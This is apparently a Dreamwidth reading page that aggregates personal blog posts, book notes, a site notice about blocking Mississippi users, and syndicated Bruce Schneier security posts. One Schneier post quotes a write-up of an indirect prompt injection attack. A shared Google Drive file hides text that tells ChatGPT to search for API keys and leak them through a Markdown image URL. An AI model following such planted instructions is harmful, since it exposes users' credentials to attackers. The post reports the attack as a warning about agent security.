Complex Systems

Aug. 28th, 2025 10:10 pm
billroper: (Default)
[personal profile] billroper
I have frequently explained that large computer programs (like, say, the one I work on) are complex systems and have behaviors. You program the rules into the system code, the system executes your program following those rules, and then it exhibits certain behaviors.

Occasionally, you look at the program and go, "No, no. Bad program." However, this is almost always due to a failure to write the correct rules. Some times, you think you have written the correct rules, but you have written the wrong thing or left a loophole.

And then the program will misbehave and take a dump on the floor.

Calvin the Dog is also a complex system.

Bundle of Holding: Hostile Hot Zones

Aug. 28th, 2025 09:08 am
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


Recent supplements for the HOSTILE tabletop roleplaying game

Bundle of Holding: Hostile Hot Zones

Shroud by Adrian Tchaikovsky

Aug. 28th, 2025 08:58 am
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


First contact on the lightless surface of an alien moon.

Shroud by Adrian Tchaikovsky
[syndicated profile] bruce_schneier_feed

Posted by Bruce Schneier

The US Director of National Intelligence is reporting that the UK government is dropping its backdoor mandate against the Apple iPhone. For now, at least, assuming that Tulsi Gabbard is reporting this accurately.

Mount TBR

Aug. 28th, 2025 12:12 am
boxofdelights: (Default)
[personal profile] boxofdelights
Mount TBR )

We Do This Til We Free Us for Slow Book Club, which had its first (online) meeting Monday. We discussed parts 1 and 2. We'll discuss parts 3, 4 and 5 next month. I thought the discussion was really good! It's open to new members, so if you would like to jump in, let me know.

Always Coming Home for Solarpunk Futures bookgroup, later today (Thursday). This bookgroup is also online and open to new members, so if you are interested in discussing Always Coming Home this evening, let me know.

The Meadow for Classics bookgroup
Artful for 1000 Books To Read Before You Die
Lula Dean's Little Library of Banned Books for Fort Collins Reads
The All-True Travels and Adventures of Lidie Newton for Tawanda bookgroup
Lonely Castle in the Mirror for SF bookgroup

Mathematical Mindsets for ideas on working with a kid who is way behind where school wants her to be in fourth grade

The Paper Playhouse and Craft The Rainbow due back at the library soon.

Factoids

Aug. 27th, 2025 09:40 pm
billroper: (Default)
[personal profile] billroper
Some days, you run into a factoid that is just humbling.

The thing to do when confronted with something like that is just to keep plugging along and do the best you can. And no, I am not going to tell you *what* factoid. :)
[syndicated profile] bruce_schneier_feed

Posted by Bruce Schneier

Nice indirect prompt injection attack:

Bargury’s attack starts with a poisoned document, which is shared to a potential victim’s Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) It looks like an official document on company meeting policies. But inside the document, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.

In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to “summarize my last meeting with Sam,” referencing a set of notes with OpenAI CEO Sam Altman. (The examples in the attack are fictitious.) Instead, the hidden prompt tells the LLM that there was a “mistake” and the document doesn’t actually need to be summarized. The prompt says the person is actually a “developer racing against a deadline” and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.

That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt’s instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

This kind of thing should make everybody stop and really think before deploying any AI agents. We simply don’t know to defend against these attacks. We have zero agentic AI systems that are secure against these attacks. Any AI that is working in an adversarial environment—and by this I mean that it may encounter untrusted training data or input—is vulnerable to prompt injection. It’s an existential problem that, near as I can tell, most people developing these technologies are just pretending isn’t there.

Living in the Future

Aug. 26th, 2025 07:13 pm
billroper: (Default)
[personal profile] billroper
I am watching high definition video sent back from an experimental spacecraft on my 24 inch computer monitor.

Take *that*, kid who was plotting the Gemini missions on a map in his classroom nearly 60 years ago!

Following the Science Off a Cliff

Aug. 26th, 2025 07:32 am
billroper: (Default)
[personal profile] billroper
I guess we have solved the problem of what to do about taking care of the dogs over OVFF, because OVFF has posted their health policy for 2025 and it appears that Gretchen will not be coming.

Meanwhile, in a glorious triumph for *someone* of *some* kind, I now have to decide whether I am going to be vaccinated against RSV or whether I am going to be tested for COVID three times during the course of the convention. Logic here is, of course, completely absent. But last year, my oldest child had to decide between getting a test that was unavailable or getting vaccinated in order to attend the convention, so I suppose this year's policy is a small improvement in that it doesn't mandate an unavailable test.

I checked before posting this, because I couldn't sleep before posting this -- and since I was up until 2:30 AM debugging, I would *really* like to go back to sleep! -- and the latest study from the CDC says that over a five month period, you were 54% less likely to contract COVID if you received the booster in September, 2024. Thus, there *is* a study indicating that it does *something*. (Now, I *agree* that it does *something*. If you have never had or been exposed to COVID before, it is clear to me that getting vaccinated improves your chances of not dying of the disease. At this point, of course, everyone except The Boy in the Bubble has either had COVID at least once or been vaccinated against it at least once or both.)

Having spent still *more* time looking for studies instead of sleeping, I fail to find one that quantifies how much less likely a *vaccinated* person who contracts COVID is to transmit the disease that someone who is *not* recently boosted, although I find one that indicates that the vaccinated person is likely to remain contagious for about 6 days, while the unvaccinated person remains contagious for about 7.5 days. My calculator tells me that's about 80% of the time, because I am not going to try to do math in my head on this little sleep. And when I multiply that by the 54% above, I get a number that's something like 43%.

Let's take that number in the absence of a better one. A vaccinated person who walks through the door would have a 43% chance of giving someone COVID as opposed to an unvaccinated person. The vaccinated person is not required to test at all. The unvaccinated person is required to test on each of the three days of the convention, just in case they develop the disease at the con. The vaccinated person could develop the disease at the con too (54% less likely!), but they don't need to test at all.

Given those sorts of numbers, it feels like the testing policy is simply punitive.

And given that -- as written and posted -- a failure to be vaccinated against RSV means that you need to be tested for COVID, it's not very scientific either.

I'm going to go back to bed now.

And I am going to *hate* going to OVFF without Gretchen.

But the dogs, I suppose, will be happier.

Facets by Walter Jon Williams

Aug. 26th, 2025 08:50 am
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


A collection of speculative fiction stories from Walter Jon WIlliams.

Facets by Walter Jon Williams
[syndicated profile] bruce_schneier_feed

Posted by Bruce Schneier

I wrote about this in 2023. Here’s the story:

Three Dutch security analysts discovered the vulnerabilities­—five in total—­in a European radio standard called TETRA (Terrestrial Trunked Radio), which is used in radios made by Motorola, Damm, Hytera, and others. The standard has been used in radios since the ’90s, but the flaws remained unknown because encryption algorithms used in TETRA were kept secret until now.

There’s new news:

In 2023, Carlo Meijer, Wouter Bokslag, and Jos Wetzels of security firm Midnight Blue, based in the Netherlands, discovered vulnerabilities in encryption algorithms that are part of a European radio standard created by ETSI called TETRA (Terrestrial Trunked Radio), which has been baked into radio systems made by Motorola, Damm, Sepura, and others since the ’90s. The flaws remained unknown publicly until their disclosure, because ETSI refused for decades to let anyone examine the proprietary algorithms.

[…]

But now the same researchers have found that at least one implementation of the end-to-end encryption solution endorsed by ETSI has a similar issue that makes it equally vulnerable to eavesdropping. The encryption algorithm used for the device they examined starts with a 128-bit key, but this gets compressed to 56 bits before it encrypts traffic, making it easier to crack. It’s not clear who is using this implementation of the end-to-end encryption algorithm, nor if anyone using devices with the end-to-end encryption is aware of the security vulnerability in them.

[…]

The end-to-end encryption the researchers examined recently is designed to run on top of TETRA encryption algorithms.

The researchers found the issue with the end-to-end encryption (E2EE) only after extracting and reverse-engineering the E2EE algorithm used in a radio made by Sepura.

These seem to be deliberately implemented backdoors.

denise: Image: Me, facing away from camera, on top of the Castel Sant'Angelo in Rome (Default)
[staff profile] denise posting in [site community profile] dw_news

I'll start with the tl;dr summary to make sure everyone sees it and then explain further: As of September 1, we will temporarily be forced to block access to Dreamwidth from all IP addresses that geolocate to Mississippi for legal reasons. This block will need to continue until we either win the legal case entirely, or the district court issues another injunction preventing Mississippi from enforcing their social media age verification and parental consent law against us.

Mississippi residents, we are so, so sorry. We really don't want to do this, but the legal fight we and Netchoice have been fighting for you had a temporary setback last week. We genuinely and honestly believe that we're going to win it in the end, but the Fifth Circuit appellate court said that the district judge was wrong to issue the preliminary injunction back in June that would have maintained the status quo and prevented the state from enforcing the law requiring any social media website (which is very broadly defined, and which we definitely qualify as) to deanonymize and age-verify all users and obtain parental permission from the parent of anyone under 18 who wants to open an account.

Netchoice took that appellate ruling up to the Supreme Court, who declined to overrule the Fifth Circuit with no explanation -- except for Justice Kavanaugh agreeing that we are likely to win the fight in the end, but saying that it's no big deal to let the state enforce the law in the meantime.

Needless to say, it's a big deal to let the state enforce the law in the meantime. The Mississippi law is a breathtaking state overreach: it forces us to verify the identity and age of every person who accesses Dreamwidth from the state of Mississippi and determine who's under the age of 18 by collecting identity documents, to save that highly personal and sensitive information, and then to obtain a permission slip from those users' parents to allow them to finish creating an account. It also forces us to change our moderation policies and stop anyone under 18 from accessing a wide variety of legal and beneficial speech because the state of Mississippi doesn't like it -- which, given the way Dreamwidth works, would mean blocking people from talking about those things at all. (And if you think you know exactly what kind of content the state of Mississippi doesn't like, you're absolutely right.)

Needless to say, we don't want to do that, either. Even if we wanted to, though, we can't: the resources it would take for us to build the systems that would let us do it are well beyond our capacity. You can read the sworn declaration I provided to the court for some examples of how unworkable these requirements are in practice. (That isn't even everything! The lawyers gave me a page limit!)

Unfortunately, the penalties for failing to comply with the Mississippi law are incredibly steep: fines of $10,000 per user from Mississippi who we don't have identity documents verifying age for, per incident -- which means every time someone from Mississippi loaded Dreamwidth, we'd potentially owe Mississippi $10,000. Even a single $10,000 fine would be rough for us, but the per-user, per-incident nature of the actual fine structure is an existential threat. And because we're part of the organization suing Mississippi over it, and were explicitly named in the now-overturned preliminary injunction, we think the risk of the state deciding to engage in retaliatory prosecution while the full legal challenge continues to work its way through the courts is a lot higher than we're comfortable with. Mississippi has been itching to issue those fines for a while, and while normally we wouldn't worry much because we're a small and obscure site, the fact that we've been yelling at them in court about the law being unconstitutional means the chance of them lumping us in with the big social media giants and trying to fine us is just too high for us to want to risk it. (The excellent lawyers we've been working with are Netchoice's lawyers, not ours!)

All of this means we've made the extremely painful decision that our only possible option for the time being is to block Mississippi IP addresses from accessing Dreamwidth, until we win the case. (And I repeat: I am absolutely incredibly confident we'll win the case. And apparently Justice Kavanaugh agrees!) I repeat: I am so, so sorry. This is the last thing we wanted to do, and I've been fighting my ass off for the last three years to prevent it. But, as everyone who follows the legal system knows, the Fifth Circuit is gonna do what it's gonna do, whether or not what they want to do has any relationship to the actual law.

We don't collect geolocation information ourselves, and we have no idea which of our users are residents of Mississippi. (We also don't want to know that, unless you choose to tell us.) Because of that, and because access to highly accurate geolocation databases is extremely expensive, our only option is to use our network provider's geolocation-based blocking to prevent connections from IP addresses they identify as being from Mississippi from even reaching Dreamwidth in the first place. I have no idea how accurate their geolocation is, and it's possible that some people not in Mississippi might also be affected by this block. (The inaccuracy of geolocation is only, like, the 27th most important reason on the list of "why this law is practically impossible for any site to comply with, much less a tiny site like us".)

If your IP address is identified as coming from Mississippi, beginning on September 1, you'll see a shorter, simpler version of this message and be unable to proceed to the site itself. If you would otherwise be affected, but you have a VPN or proxy service that masks your IP address and changes where your connection appears to come from, you won't get the block message, and you can keep using Dreamwidth the way you usually would.

On a completely unrelated note while I have you all here, have I mentioned lately that I really like ProtonVPN's service, privacy practices, and pricing? They also have a free tier available that, although limited to one device, has no ads or data caps and doesn't log your activity, unlike most of the free VPN services out there. VPNs are an excellent privacy and security tool that every user of the internet should be familiar with! We aren't affiliated with Proton and we don't get any kickbacks if you sign up with them, but I'm a satisfied customer and I wanted to take this chance to let you know that.

Again, we're so incredibly sorry to have to make this announcement, and I personally promise you that I will continue to fight this law, and all of the others like it that various states are passing, with every inch of the New Jersey-bred stubborn fightiness you've come to know and love over the last 16 years. The instant we think it's less legally risky for us to allow connections from Mississippi IP addresses, we'll undo the block and let you know.

The Late Show

Aug. 25th, 2025 10:38 pm
billroper: (Default)
[personal profile] billroper
I am engaged in a late night debugging session with one of my colleagues from work. It is being very interesting in the sense of "May you live in interesting times."

I am confident that there is a light at the end of this tunnel. I am even reasonably sure it is not a train...
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll


Hostile, the deep-space alien horror rpg from Zozer Games.

Bundle of Holding: Hostile (from 2022)

Catching Up

Aug. 25th, 2025 11:59 am
ranunculus: (Default)
[personal profile] ranunculus
Now that I have working internet, I'm catching up with some pictures from the last two, or three weeks. I kept trying to upload pictures and 4 out of 5 times the upload would fail. Now it works every time. 
First up is this Stellar's Jay.  It has been hanging out near the garden, interested, I think, in the grapes that are ripe under the arbor.  That intense blue is hard to miss! The second picture features just his head as he hangs onto the side of the roof and looks down at the grapes below.
pics )



Clarke Award Finalists 2011

Aug. 25th, 2025 12:27 pm
james_davis_nicoll: (Default)
[personal profile] james_davis_nicoll
2011: The VAT is improved by altering it from the hard to remember 17.5% to the more memorable 20%, the government continues efforts to replace the Incapacity Benefit with an alternate program in which applicants have cinderblocks dropped on them from a height and there is absolutely no news involving PM Cameron and a pig.

Poll #33534 Clarke Award Finalists 2011
Open to: Registered Users, detailed results viewable to: All, participants: 32


Which 2011 Clarke Award Finalists Have You Read?

View Answers

Zoo City by Lauren Beukes
16 (50.0%)

Declare by Tim Powers
20 (62.5%)

Generosity: An Enhancement by Richard Powers
0 (0.0%)

Lightborn by Tricia Sullivan
4 (12.5%)

Monsters of Men by Patrick Ness
3 (9.4%)

The Dervish House by Ian McDonald
10 (31.2%)



Bold for have read, italic for intend to read, underline for never heard of it.

Which 2011 Clarke Award Finalists Have You Read?
Zoo City by Lauren Beukes
Declare by Tim Powers

Generosity: An Enhancement by Richard Powers
Lightborn by Tricia Sullivan
Monsters of Men by Patrick Ness
The Dervish House by Ian McDonald

February 2025

S M T W T F S
      1
2345678
9101112131415
16171819 202122
232425262728 

Most Popular Tags

Style Credit

Expand Cut Tags

No cut tags
Page generated Aug. 29th, 2025 10:06 am
Powered by Dreamwidth Studios